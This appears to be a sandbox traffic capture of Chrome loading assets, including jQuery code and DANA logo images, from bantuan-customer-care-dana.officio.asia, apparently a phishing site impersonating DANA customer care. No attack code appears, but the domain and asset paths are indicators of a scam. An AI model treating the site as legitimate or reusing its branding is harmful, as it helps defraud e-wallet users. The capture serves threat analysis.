                                                  2024-10-13 17:33:27 UTC16384INData Raw: 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 70 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d 6f 76 65 41 74 74
                                                  Data Ascii: nd({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?pt:void 0)),void 0!==n?null===n?void S.removeAtt
                                                  2024-10-13 17:33:27 UTC7556INData Raw: 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 3d 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 29 2c 65 29 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 6e 2c 65 5b 6e 5d 29 3b 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 28 6f 3d 61 3d 72 2e
                                                  Data Ascii: i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-Requested-With"]="XMLHttpRequest"),e)r.setRequestHeader(n,e[n]);o=function(e){return function(){o&&(o=a=r.


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449764104.21.61.834435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:27 UTC384OUTGET /ast/img/dana_logo.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:27 UTC707INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:27 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 12786
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:12 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9LhK8r%2BgojrA%2FdWqAfGGX141A%2F%2BNDfc6I2p9fby%2BXXZoW0m8OpSCLKnRshsp0Ppk%2FQOv2%2FoXFTXWLvRCmM9oZxGU0T9Dx9F7U0Kyvnq9sJFm2U5ZUnzSELrHsiD5SryyV%2BOM2Rzq6b%2Fi5LKflkajz1I%2BL%2B5EAC5buA%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d2113289fbf0f88-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:27 UTC662INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76
                                                  Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv
                                                  2024-10-13 17:33:27 UTC1369INData Raw: b3 7b 9e 0e 61 71 2c 9c 5d 0f 1f 3e bc de 40 c3 a2 bc 57 61 3c 1f c8 df 7f f0 c1 07 65 bd 29 6f dd b0 78 3c c6 b2 38 16 b6 68 d1 a2 ba ec fe e0 c1 83 bb 59 3c 5d 59 38 46 ac 8d d9 3d 1f ff de 7b ef 55 a6 f0 2b 57 ae dc f8 ed b7 df 86 8b 68 58 18 8d 7a d9 bd 87 07 7b a0 2b cf 54 74 cf 68 2f 5d ba 64 3a c8 3a 71 e2 c4 31 23 2f d1 33 86 02 a7 59 1e 8c 2f 7b 1e 35 6a d4 3d a2 34 2c 9e ae 14 8f f9 c1 32 2f 3a c6 04 3c 31 bb 27 1a f6 33 86 b1 67 ba 12 8d dd 33 3a 04 2f 8d 91 a7 2c 0f 4a e7 6d 0a 7c 86 76 f7 18 a7 5f 34 a3 b9 76 ed 9a 57 30 9e 86 32 e3 9f 9d dc 8b 78 58 16 80 4f 70 f9 f2 e5 6b 2c d3 ec d9 b3 67 66 f7 ec 7a f6 ec d9 3d 08 2f 4d cf b3 67 cf 1e c8 c2 d9 95 8d 22 e9 f9 e9 a7 9f 5e cf c2 55 ae a6 3c 48 50 95 1f 9f a9 31 5d b7 6e dd ca f1 f1 74 4f 34
                                                  Data Ascii: {aq,]>@Wa<e)ox<8hY<]Y8F={U+WhXz{+Tth/]d::q1#/3Y/{5j=4,2/:<1'3g3:/,Jm|v_4vW02xXOpk,gfz=/Mg"^U<HP1]ntO4
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 9d 91 c7 e8 d1 a3 1f b2 8a 27 7a a8 d3 e3 ad 68 f0 6d ea 64 15 4f 3c b0 b5 ad 88 15 cd ba 75 eb de 4b 11 cf 3f f0 f7 c4 cc 8f 5f 36 9e 17 bb 17 f1 b3 03 9f d2 b0 f4 74 15 f1 c0 e2 fd e7 8c 06 ad ec ff 8b 68 58 bc 19 8f bf fe fa 6b 05 a3 c1 db d1 c1 09 0f 7c 57 0e 32 1e 64 b5 6d cb 83 11 1b af a2 84 0a 61 66 e0 fb 58 4a b8 01 3e 80 db c9 e4 cf 9b 37 af f0 db 70 fd fa 75 46 22 ac 40 7c 4c 8f 33 02 94 53 68 43 cd e2 e9 2a c2 02 dd 93 97 44 14 4f 61 5e 02 dc 78 c7 f9 66 c4 6e 86 e7 cb 97 2f bd 13 7e 86 ee 26 a8 32 3b 91 57 36 8d b0 86 65 13 ab d2 c1 62 cd 74 7b 80 15 2f 8c 54 78 f3 44 4b 0b 85 6d db b6 ad 42 a3 ba 6e e4 47 fb 8c 82 f9 c3 9b 44 6b e2 96 99 06 15 7c 08 23 7c 5d dd 04 25 77 ee dc a5 dc e4 e7 94 17 86 a5 09 76 69 a3 b7 6f df 6e 3a fb b4 4b cc c5
                                                  Data Ascii: 'zhmdO<uK?_6thXk|W2dmafXJ>7puF"@|L3ShC*DOa^xfn/~&2;W6ebt{/TxDKmBnGDk|#|]%wvion:K
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 77 55 9b 25 e4 c2 f7 ee dd fb 1b 4b c7 5f e1 78 7b 0a 47 66 79 8b 2d 9f cf f1 69 d9 3d 86 3f d2 d6 72 30 71 f1 6e dd 64 e9 e9 8a 46 f9 be 65 e6 5c 24 3a 97 11 7c 5a 76 0f 4d e4 61 8e cc f2 16 f3 a0 14 1b b5 19 0f 8c 40 3a 50 42 e9 06 45 09 2d 73 0a 7c 64 40 64 f5 b7 f1 53 b1 61 2a 5f 8f 01 cb 5f e1 fb c2 7b 0a 93 1d 3c 50 36 ac e1 d3 b2 fb 27 9e 78 22 c1 2e 2d 1f cf d2 f1 57 1a 72 f2 34 56 f7 18 5b 1f e0 d3 b2 7b f8 6b cd 65 95 ce 10 e7 71 95 c0 d2 b2 ab 8a b9 29 68 85 0d 17 f9 78 e7 aa 86 3c 7d 1e b1 0b 2a 3b cb 9b bf 62 68 7c 34 1a de 1b 9f f6 49 91 4a 02 68 92 14 ac a2 0c 1e 3c 78 25 3a 46 9f cf 3a 7c 8f e4 94 95 21 36 36 36 87 88 16 c3 52 25 7f e5 18 8a fa b0 81 02 21 85 66 cf 87 80 0b 80 c6 58 b8 7a 8e c6 a8 a2 02 17 76 94 66 bc b9 ec bd b7 16 b4 42
                                                  Data Ascii: wU%K_x{Gfy-i=?r0qndFe\$:|ZvMa@:PBE-s|d@dSa*__{<P6'x".-Wr4V[{keq)hx<}*;bh|4IJh<x%:F:|!666R%!fXzvfB
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 23 3f 09 47 8c 18 51 a5 56 ad 5a ed cb 94 29 73 2f 06 09 d9 e0 91 21 11 ea f0 df 60 93 35 b9 43 87 0e 6b fd 64 2f 9d 7c f2 e4 c9 b5 2a 54 a8 d0 b6 64 c9 92 b5 e0 ab 28 0b ea e7 3c 94 34 ab 7e fd f5 d7 89 38 3f 62 ab 34 23 22 8c a4 13 18 45 f3 02 72 25 a2 54 e0 9b c4 a6 4e 8d 44 79 f0 61 70 aa 74 65 c1 82 05 01 f7 d3 83 ca 1c c6 e7 6b 76 0f 73 f1 25 28 52 9c 03 0c a4 92 c0 f2 56 ea 64 9c 9d 3b 77 52 c7 90 a2 63 95 ca 40 92 68 f7 ee dd df 98 61 c0 87 c3 a3 87 9c 3a bc 73 e7 ce 25 f8 84 91 7a 8f 33 bc a8 f7 57 f9 39 6e fc 0c 23 3a 86 68 f8 f0 e1 b5 54 32 95 a1 85 db f3 2a 22 ef 6b 2c 5f b3 eb a2 45 8b 5e 92 e1 2f 4b 83 03 e0 ea 9b e5 65 15 3e 67 ce 1c 57 dd df cf 9b 37 af 8d 55 7e 66 71 13 27 4e bc d7 b2 ac f8 7c 6e 31 4b 1c c8 70 f2 12 87 2d 8b ab 70 18 5d
                                                  Data Ascii: #?GQVZ)s/!`5Ckd/|*Td(<4~8?b4#"Er%TNDyaptekvs%(RVd;wRc@ha:s%z3W9n#:hT2*"k,_E^/Ke>gW7U~fq'N|n1Kp-p]
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 25 62 14 8e 61 d0 cc 14 0b a6 5c d0 30 4d 11 e5 57 bd 7a f5 06 a2 70 63 58 e3 c6 8d 85 56 a9 e8 b9 94 c6 eb 18 3a 1d 31 f2 a6 67 68 85 72 8a c2 8d 61 b0 1b 32 93 e3 84 91 d6 ea 19 13 4e 21 3d ec 81 bc aa 46 ab f4 f0 07 25 34 53 c7 c4 ff 6f ab 74 c6 38 e0 77 ca 18 46 cf 70 c6 90 10 0d 15 a7 f0 4d 17 25 88 a4 30 f8 06 15 82 17 a8 32 40 fd 28 ec 91 a0 fe 2b 17 a8 3c 03 c1 57 75 78 a3 2a 03 f8 ab 26 f1 8b 1e aa 6a b3 f4 37 a4 c7 a3 66 1c c2 38 dc b4 d4 81 90 19 7a e6 f3 22 be b4 30 20 0a d7 61 a1 47 20 1a 9f c9 73 a1 17 c3 7d 09 60 33 74 c9 7d ae e6 1c 61 50 57 4a 14 8b b9 c0 49 51 78 a0 c2 68 92 18 28 de e1 c0 57 b5 7c e8 f9 4d f1 88 c5 18 8a c6 66 c2 c9 56 38 14 d6 a9 0c d0 0a 28 4d 14 9d e6 c3 d2 61 6c df 86 dd f3 57 ac d8 6e e4 9f 55 ef 31 2c 2d 81 c9 e6
                                                  Data Ascii: %ba\0MWzpcXV:1ghra2N!=F%4Sot8wFpM%02@(+<Wux*&j7f8z"0 aG s}`3t}aPWJIQxh(W|MfV8(MalWnU1,-
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 69 ad 1c e9 61 60 75 3e 1c 5e 00 1c 09 24 a5 2a 4b 6b 15 a4 cb 1b 60 04 a0 05 0a e9 a1 d4 b0 41 1a 15 e0 22 6a f6 1a 01 73 04 e0 ec a7 29 19 b6 05 f3 07 0f 13 97 9f 7b ee b9 aa e6 52 e9 18 8d 40 10 11 80 df ce 89 c1 78 01 68 7f 6c 10 8b a5 b3 d2 08 48 23 90 01 46 5d 13 c8 34 c0 cd 1f cc ab 93 d1 e8 07 49 4b a1 09 35 02 a1 44 e0 dd 77 df 6d 86 23 22 37 38 7d 11 d0 e0 6f 60 eb df 0a b8 9f ae 13 ca 72 e8 bc d3 0e 02 56 8b 5c 8e 51 a0 4d e8 4f 3d f5 14 1d df d3 18 be 2a 2b 67 c9 92 25 0f b6 05 66 27 03 3b 18 6e 5d c7 e1 05 e7 b1 82 7c 0c c6 68 9b 31 89 5e 0c 43 aa c5 30 62 3a ee 38 43 9d 50 23 e0 00 81 80 34 7e 07 72 d8 26 79 e0 81 07 f2 bd f8 e2 8b a5 61 37 5f 15 8b 5b 95 f3 e6 cd 5b 1e e6 bb 05 b0 8f 20 17 ac 50 b3 c6 c7 c7 a7 37 b7 5e bd cd 9e ac 26 b1 c7
                                                  Data Ascii: ia`u>^$*Kk`A"js){R@xhlH#F]4IK5Dwm#"78}o`rV\QMO=*+g%f';n]|h1^C0b:8CP#4~r&ya7_[[ P7^&
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 96 2d 73 5a b4 68 51 20 50 05 57 e5 3b 6b d6 ac ce 18 00 fc cb cb 18 8a 7b cc 02 16 d3 e1 44 aa f2 bb 4d 0f 35 ce 1b 98 95 84 bc bf a0 f7 18 65 0b f5 6c 31 9e 66 23 a1 68 0f 7c 9e 70 71 9f bc 66 cd 9a 01 d2 75 fd f4 d3 4f 97 c4 57 fb 28 cf 24 35 dc e3 4b 78 61 cf 9e 3d 4b d0 c1 77 25 f7 12 d2 80 38 20 1c 3e 7c 78 25 74 56 b3 dc 3e 96 1b 0d 6a 11 c4 09 d4 4e df b0 ed f8 59 fb 83 fa 60 06 a9 55 1c 54 89 2b 49 7a f5 ea 95 00 75 d4 2e 26 4f 38 5c 69 e6 89 11 de 9b ae 14 50 91 c9 b8 71 e3 ea 43 9d 13 d4 11 be 1d e6 18 cc 5d 99 37 6f de b3 8a 45 71 85 7c e1 c2 85 ed 91 7f 50 47 f8 76 78 a0 2f 3f 03 55 71 4d bb 02 a6 43 87 35 dd 8e 99 4a 3c 46 46 27 c8 f6 9f d4 26 2a e9 fc a1 3d 73 e6 cc 89 5d bb 76 4d 9b 39 73 e6 23 95 2b 57 ce 61 57 e8 40 c5 3f fe f8 e3 65 31
                                                  Data Ascii: -sZhQ PW;k{DM5el1f#h|pqfuOW($5Kxa=Kw%8 >|x%tV>jNY`UT+Izu.&O8\iPqC]7oEq|PGvx/?UqMC5J<FF'&*=s]vM9s#+WaW@?e1
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 65 09 6e 3c f9 e4 93 6f 62 34 f5 ab 6c ca 02 05 0a 54 7c e5 95 57 5c dd e0 86 8f 49 0e 7c 54 a4 3f 26 e8 f8 0f c3 a5 c0 56 59 99 15 e9 ae c2 52 8d 54 86 52 c9 62 63 63 e3 d0 51 17 93 22 96 24 6a d4 a8 51 9e 98 98 18 69 f5 22 66 28 3b b0 06 b4 57 92 bd 12 19 d6 19 ce c1 08 65 bd 6c 22 7c bc b3 d5 ad 5b b7 a0 2c bd 0c 5d ad 5a b5 0a 03 8f 3b 64 68 89 06 fa f8 df 30 d2 3e 2f 4b af 42 d7 b3 67 cf 3d 58 57 da 21 9b 26 53 a6 4c 65 61 bd 59 3d ba 73 e7 ce 15 50 88 fc b2 09 35 5d e8 11 40 c7 4f f5 15 b0 45 bc 50 96 10 a6 6c e7 b0 08 35 05 6a 16 29 31 e2 e2 e2 a2 8b 16 2d aa 6a 61 64 c9 1b a3 c4 18 74 18 2a 6a 8a eb a7 4f 9f 4e b6 64 ea 47 24 b0 a0 85 3c 29 0e 78 97 a3 b2 64 c9 a2 22 bb 2d 5f c2 18 44 f4 27 f5 83 bc 49 20 94 ab 40 29 8e 29 89 b0 96 21 8d 35 9c 0e
                                                  Data Ascii: en<ob4lT|W\I|T?&VYRTRbccQ"$jQi"f(;Wel"|[,]Z;dh0>/KBg=XW!&SLeaY=sP5]@OEPl5j)1-jadt*jONdG$<)xd"-_D'I @))!5
                                                  2024-10-13 17:33:27 UTC1172INData Raw: d4 1a 98 fe e3 16 ae 6e f1 41 fb 4a 07 f5 60 c0 46 e4 98 95 ba d7 98 dc 2a b4 e6 23 8d 00 ea 2f 45 3f 2b 9d 50 8e 90 78 2b f3 37 7e 95 6f c0 a4 ae 17 5c 9f 56 2c 59 b2 e4 bd 72 f9 da 53 51 b9 61 ad 51 8d fe f0 71 f1 24 40 67 76 0d 6e 59 0e 42 6f bd 17 d7 3d 50 93 1c 82 bf 93 33 08 f7 6c d5 87 3a 20 13 54 09 d9 f0 42 e5 c3 a2 5f 51 3c 17 c5 63 51 78 97 c8 07 df 21 01 7b c9 ec 4b 13 7c 0a 58 f1 7c dc a6 4d 9b cf 83 9f 73 e8 72 c4 c0 24 0a 23 bb 65 a3 46 8d 7a 09 0e d0 b6 87 4e 12 9d b3 46 20 f5 21 60 ec f8 a3 b0 60 99 d8 bb 77 ef 56 38 05 e8 47 78 3e 74 d5 9d 29 0f 1f 3a f2 58 2c ec 95 a4 3f 84 3f c8 c7 e9 fb db 08 60 63 d0 cc fa f5 eb f7 b9 1d 92 ba ef 60 97 bf 07 47 2b 0e 69 df be fd 54 94 54 db 18 a7 ee ea d6 a5 0b 11 02 3e 1d 3f c9 01 8b 8b a3 18 5d 37
                                                  Data Ascii: nAJ`F*#/E?+Px+7~o\V,YrSQaQq$@gvnYBo=P3l: TB_Q<cQx!{K|X|Msr$#eFzNF !``wV8Gx>t):X,??`c`G+iTT>?]7


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449766172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC644OUTGET /ast/img/dana_text.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC689INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 10588
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:16 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4KDdjKNJB%2BPVCkDFaVje39Q2wrn417m6zruipF6egiSaUh03ZmMbshsHvOa3WO4LViAwH43XKJYfrEfIQvdqZYm8mnuE41Sj6hralPtDkhogvMAt5k%2F9h6kTG3cKPYtabPEtbZVJp078aPxXOs4z9vFFQcURt0laMwU%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b4de942b2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC680INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 e0 00 00 00 76 08 06 00 00 00 10 9c 40 7f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 78 9c 57 7d e7 bf bf f3 ce 68 a4 91 c6 92 6d c9 b2 62 3b 11 89 21 89 53 6e b1 21 40 d2 20 3f dd 66 cb bd 85 75 d2 3e dd 96 6b 6f cb 25 d0 74 81 c0 52 14 1a 68 a1 85 2e 6d b9 b4 0b 5d 5a 1a 58 64 9a 2e 94 72 ed 62 71 29 2d d4 22 0d c5 4e 1a 2b 8e 82 65 c9 b2 64 59 b7 91 e6 f2 be e7 bb 7f 9c 77 ec b1 e2 8b 64 cd 79 e7 7d 35 e7 f3 3c 7a 6c 49 af e6 9c f7 bc e7 3d bf f3 bb 1e c0 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c 0e 87 c3 e1 70 38 1c eb 8a 81 81 01 6f 72 72 32 47 72 c3 a9 53 a7 36 90 bc d8 57 fb 2a 7e 77 b1 6b 57 d4 ce
                                                  Data Ascii: PNGIHDRv@sRGBsBIT|d IDATx{xW}hmb;!Sn!@ ?fu>ko%tRh.m]ZXd.rbq)-"N+edYwdy}5<zlI=p8p8p8p8orr2GrS6W*~wkW
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 00 71 56 88 93 64 59 44 4e 90 9c 10 91 c3 41 10 7c c5 f3 bc ef 00 98 1f 1a 1a 2a ed de bd db bd 6c f1 46 48 aa d1 d1 d1 a6 f6 f6 f6 6c 2e 97 7b 8a d6 fa 76 11 79 9e 88 ec 80 11 c2 1e cc 06 4d ad f0 33 2b 73 44 03 28 00 18 07 70 4c 6b fd 65 a5 d4 17 4e 9f 3e 3d b9 71 e3 c6 25 98 85 58 5b b8 27 c7 ea 90 03 07 0e 78 7d 7d 7d e9 85 85 85 b6 b6 b6 b6 a7 02 b8 1d c0 8d 00 ae 04 b0 09 a1 42 50 f5 75 29 aa e7 40 1e c0 71 92 47 45 e4 7e 00 df 04 70 0a 40 31 bc 26 70 6b 44 7d 09 15 bc d4 e4 e4 64 a6 ab ab ab 1d c0 ad 30 73 e0 1a 92 db 45 24 87 73 e7 c0 8a 3e 16 e6 f9 6b 92 33 22 72 1c c0 8f 00 fc 0d 80 7f 9b 98 98 58 1c 1d 1d ad bf 8c 38 76 ec 58 0b c9 ef 73 7d 10 90 9c 20 f9 1f 41 10 bc b3 54 2a ed 9e 9b 9b db 4c b3 4b 76 c4 07 a1 31 15 ed 20 79 1b c9 ef 90 3c 4e
                                                  Data Ascii: qVdYDNA|*lFHl.{vyM3+sD(pLkeN>=q%X['x}}}BPu)@qGE~p@1&pkD}d0sE$s>k3"rX8vXs} AT*LKv1 y<N
                                                  2024-10-13 17:33:28 UTC1369INData Raw: d2 d2 cb b3 d9 ec 89 46 5e 17 42 cd b7 0b c0 5f 92 7c e1 b2 33 00 d6 33 1a c0 07 01 bc 0f c0 65 6b c2 95 fa 9a 8e f3 93 26 f9 c6 5c 2e f7 37 00 b6 d1 55 d1 aa 20 24 db 00 fc 06 80 0f a3 41 84 2f 60 0e 24 21 79 1d 8c 39 fa 19 34 b5 d4 1b 8e 50 f8 6e 02 70 2f 8c 00 6e a8 71 10 91 67 67 b3 d9 fb 01 dc 70 e0 c0 81 86 b4 86 84 9a ef 36 00 7f df 60 c2 17 30 b2 f3 2e ad f5 9f 00 e8 e1 65 e6 0b 37 6a 1e f0 aa 08 b5 9e ef 03 f8 a5 a1 a1 a1 d1 46 3f 71 89 64 5b 98 df fb 87 30 b9 9d 0d 47 38 27 8e 02 78 19 80 87 e3 74 c2 8a 6d 42 e1 9b 83 c9 a1 ff 1d 18 f3 7c 23 42 00 0f 14 8b c5 3b 32 99 cc 63 8d 14 17 10 2a 23 3d 00 3e 0d a0 af ce dd a9 27 01 80 fb 00 bc 55 44 26 56 fb c7 ce 07 bc 02 42 ad e7 26 00 9f dd bd 7b f7 d5 8d ec ff 23 d9 1c 04 c1 6d 4a a9 3f 42 83 0a 5f
                                                  Data Ascii: F^B_|33ek&\.7U $A/`$!y94Pnp/nqggp6`0.e7jF?qd[0G8'xtmB|#B;2c*#=>'UD&VB&{#mJ?B_
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 00 e8 ca da 01 00 bd bd bd 32 35 35 95 ea ec ec 6c 83 59 7c 6f 82 79 fe 37 c3 e4 af d7 8b 0f 4e 4e 4e f6 6f d9 b2 e5 82 66 c8 b8 42 32 a3 b5 7e 87 52 ea 5d a8 9f 00 9e 27 f9 2d 11 f9 36 80 ef 01 18 01 30 07 33 37 18 7e c9 e8 e8 a8 6c df be bd 22 88 37 fa be 7f 8d 52 ea 16 a5 d4 2d 30 72 a2 5e 73 58 c3 9c a2 f6 e5 f3 96 2a 25 99 25 f9 c3 95 9c 46 7c 99 7c 8c e6 48 bf 9a 40 93 93 ea 91 6c 99 9f 9f df 42 f2 69 24 7f 8d e4 a7 48 96 2d de c7 4a d0 24 df c4 84 17 e8 a7 19 df ff c1 fa 1d aa 7e 3f c9 3b 48 5e 4d b2 fd e0 c1 83 69 ae 30 d5 8b a4 22 d9 4c b2 b3 54 2a 3d 93 e4 3b b4 d6 ff 51 a7 fb 58 22 99 c8 b4 24 9a 83 d5 ff aa 4e e3 56 0a db 7e 29 c9 2b 27 27 27 73 34 66 bc d5 ce 81 ad 24 6f 0e 82 e0 bd 24 27 eb 71 23 5a eb 71 92 3f c5 04 a6 2a 92 ec 24 39 5b a7
                                                  Data Ascii: 255lY|oy7NNNofB2~R]'-6037~l"7R-0r^sX*%%F||H@lBi$H-J$~?;H^Mi0"LT*=;QX"$NV~)+'''s4f$o$'q#Zq?*$9[
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 48 f2 f1 52 a9 f4 4e 00 27 63 30 07 96 00 fc 5f ad f5 a7 60 bf 8e fb f3 b7 6e dd ba 21 e6 73 60 13 c9 a7 44 d0 ce ff 01 f0 67 00 16 23 68 eb a2 e4 72 b9 d3 85 42 e1 03 24 bf 6f bb 2d a5 d4 0b 7a 7b 7b cf 06 e3 35 8a 06 5c 21 0c c2 f9 59 46 17 98 f5 1b 4c 40 4e f0 cc cc cc c6 28 72 7f 83 20 f8 03 c6 2c 2f 96 c6 e7 f5 a0 ed 7b 27 f9 2e c6 f7 b0 76 a1 09 86 7b dc f2 18 94 49 fe 3c 63 94 17 4b a3 f9 3f 39 2c 9a 61 9b 67 31 a6 73 80 26 42 f8 85 b4 ec 13 0d c7 f9 e9 8c d1 ba 48 63 01 fc 25 da cf 9a 39 9d cf e7 af a8 b4 1b 9b 01 88 8a 1b 6e b8 a1 04 e0 db 5a eb 3f 88 a8 c9 df 9b 9b 9b eb 60 cc 83 b1 da db db 5b 44 e4 8a 4b 5f b9 26 66 cb e5 f2 27 00 14 2d b7 b3 2a 0e 1f 3e 7c 1a a6 ee b5 55 48 de 3a 32 32 12 db c5 b7 5c 2e f7 c2 d4 d1 b5 d9 ce 3f 4c 4e 4e fe a3
                                                  Data Ascii: HRN'c0_`n!s`Dg#hrB$o-z{{5\!YFL@N(r ,/{'.v{I<cK?9,ag1s&BHc%9nZ?`[DK_&f'-*>|UH:22\.?LNN
